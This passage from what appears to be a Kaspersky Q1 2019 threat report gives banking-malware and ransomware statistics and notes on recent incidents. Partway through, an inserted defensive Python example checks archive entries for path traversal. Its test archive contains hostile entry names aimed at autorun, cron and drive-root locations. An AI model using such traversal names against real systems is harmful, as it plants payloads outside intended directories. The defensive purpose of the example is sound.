for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23125708/en-finance-map.png>)\n\n#### Top 10 countries by share of attacked users\n\n**Country*** | **%**** \n---|--- \nSouth Korea | 2.2 \nChina | 2.1 \nBelarus | 1.6 \nVenezuela | 1.6 \nSerbia | 1.6 \nGreece | 1.5 \nEgypt | 1.4 \nPakistan | 1.3 \nCameroon | 1.3 \nZimbabwe | 1.3 \n \n_* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000)._ \n_** Unique users whose computers were targeted by 
banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 27.42 \n2 | Zbot | Trojan.Win32.Zbot | 22.86 \n3 | Emotet | Backdoor.Win32.Emotet | 9.36 \n4 | Trickster | Trojan.Win32.Trickster | 6.57 \n5 | Nymaim | Trojan.Win32.Nymaim | 5.85 \n6 | Nimnul | Virus.Win32.Nimnul | 4.59 \n7 | SpyEye | Backdoor.Win32.SpyEye | 4.29 \n8 | Neurevt | Trojan.Win32.Neurevt | 3.56 \n9 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.64 \n10 | Tinba | Trojan-Banker.Win32.Tinba | 1.39 \n \n_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).\n\n## Ransomware programs\n\n### Quarterly highlights\n\nThe most high-profile event of the quarter was probably the [LockerGoga ransomware attack](<https://ics-cert.kaspersky.com/news/2019/03/22/metallurgical-giant-norsk-hydro-attacked-by-encrypting-malware/>) on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.\n\nA vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive. 
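The class of bug just described, an archive entry whose name escapes the directory it is being unpacked into, is simplest to stop on the extraction side: validate every entry name before a single byte is written. The Python below is an added illustration, not code from the Kaspersky report or from WinRAR, and it works for any container format whose entry names you can enumerate (a zip is used here because the standard library can build one in memory). The in-memory archive, its entry names and the "autostart" directory name are constructed for the example.

```python
"""Archive entry path-traversal guard (added example, not from the report).

Every entry name is checked before extraction, and the resolved target path
is checked again for containment, so neither a '..' component, an absolute
path, nor a backslash-separated Windows path can land a file outside the
destination directory. Entry names below are constructed for illustration.
"""
import io
import os
import posixpath
import tempfile
import zipfile
from typing import List, Tuple


def is_safe_entry_name(name: str) -> bool:
    """True only if the entry stays inside the extraction directory.

    Rejects empty names, absolute POSIX paths, Windows drive and UNC paths,
    and any '..' component that survives path normalisation. Backslashes are
    treated as separators first, so 'a\\..\\b' is not mistaken for a single
    odd file name by a POSIX extractor.
    """
    if not name:
        return False
    normalised = name.replace("\\", "/")
    if normalised.startswith("/") or (len(normalised) > 1 and normalised[1] == ":"):
        return False
    collapsed = posixpath.normpath(normalised)  # folds 'a/./b', 'a//b', 'a/x/../b'
    if collapsed in ("", "."):
        return False
    return ".." not in collapsed.split("/")


def safe_target_path(dest_dir: str, name: str) -> str:
    """Resolve `name` under `dest_dir`; raise ValueError if it would escape.

    The commonpath test is an independent second check on the absolute path,
    so a mistake in the name check alone cannot cause a write outside dest_dir.
    """
    if not is_safe_entry_name(name):
        raise ValueError(f"unsafe archive entry: {name!r}")
    root = os.path.abspath(dest_dir)
    target = os.path.abspath(os.path.join(root, name.replace("\\", "/")))
    if os.path.commonpath([root, target]) != root:
        raise ValueError(f"entry escapes destination: {name!r}")
    return target


def build_sample_archive() -> bytes:
    """Construct an in-memory zip mixing benign and hostile entry names."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "benign")
        zf.writestr("img/../photo.jpg", "benign once normalised")
        zf.writestr("../../autostart/payload.exe", "escapes via ..")
        zf.writestr("..\\..\\autostart\\payload.exe", "escapes via backslashes")
        zf.writestr("/etc/cron.d/job", "absolute POSIX path")
        zf.writestr("C:\\autostart\\payload.exe", "Windows drive path")
    return buf.getvalue()


def safe_extract(zip_bytes: bytes, dest_dir: str) -> Tuple[List[str], List[str]]:
    """Extract only entries that pass the guard; return (written, rejected).

    Bytes are copied to the validated path explicitly rather than through
    ZipFile.extract(), so the path we checked is exactly the path written.
    """
    written, rejected = [], []
    root = os.path.abspath(dest_dir)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            try:
                target = safe_target_path(root, info.filename)
            except ValueError:
                rejected.append(info.filename)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(os.path.relpath(target, root))
    return written, rejected


def run_demo() -> Tuple[List[str], List[str]]:
    """Extract the sample archive into a scratch directory and report."""
    with tempfile.TemporaryDirectory() as scratch:
        written, rejected = safe_extract(build_sample_archive(), scratch)
    return sorted(written), sorted(rejected)


if __name__ == "__main__":
    ok, bad = run_demo()
    print("written :", ok)
    print("rejected:", bad)
```

Rejected entries are reported rather than silently skipped: an archive that contains even one traversal name is itself a signal worth logging, whatever else it holds.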
The cybercriminals did not miss the chance to [assemble an archive](<https://www.bleepingcomputer.com/news/security/jneca-ransomware-spread-by-winrar-ace-exploit/>) that unpacks the executable file of the JNEC ransomware into the system autorun directory.

February saw [attacks](<https://www.bleepingcomputer.com/forums/t/691852/cr1ptt0r-ransomware-files-encrypted-readmetxt-support-topic/>) on network-attached storages (NAS), in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What's more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.

Nomoreransom.org partners, in cooperation with cyber police, [created](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>) a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.

### Statistics

#### Number of new modifications

The number of new modifications fell markedly against Q4 2018 to the level of Q3. Seven new families were identified in the collection.

_Number of new ransomware modifications, Q1 2018 – Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172044/ransomware-new-modification.png>)

#### Number of users attacked by ransomware Trojans

In Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.

In February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.

_Number of unique users attacked by ransomware Trojans, Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172107/en-ransomware-users.png>)

### Attack geography

_Geography of mobile ransomware Trojans, Q1 2019_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171149/en-ransomware-map.png>)

#### Top 10 countries attacked by ransomware Trojans

| | **Country*** | **% of users attacked by cryptors**** |
|---|---|---|
| 1 | Bangladesh | 8.11 |
| 2 | Uzbekistan | 6.36 |
| 3 | Ethiopia | 2.61 |
| 4 | Mozambique | 2.28 |
| 5 | Nepal | 2.09 |
| 6 | Vietnam | 1.37 |
| 7 | Pakistan | 1.14 |
| 8 | Afghanistan | 1.13 |
| 9 | India | 1.11 |
| 10 | Indonesia | 1.07 |

* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique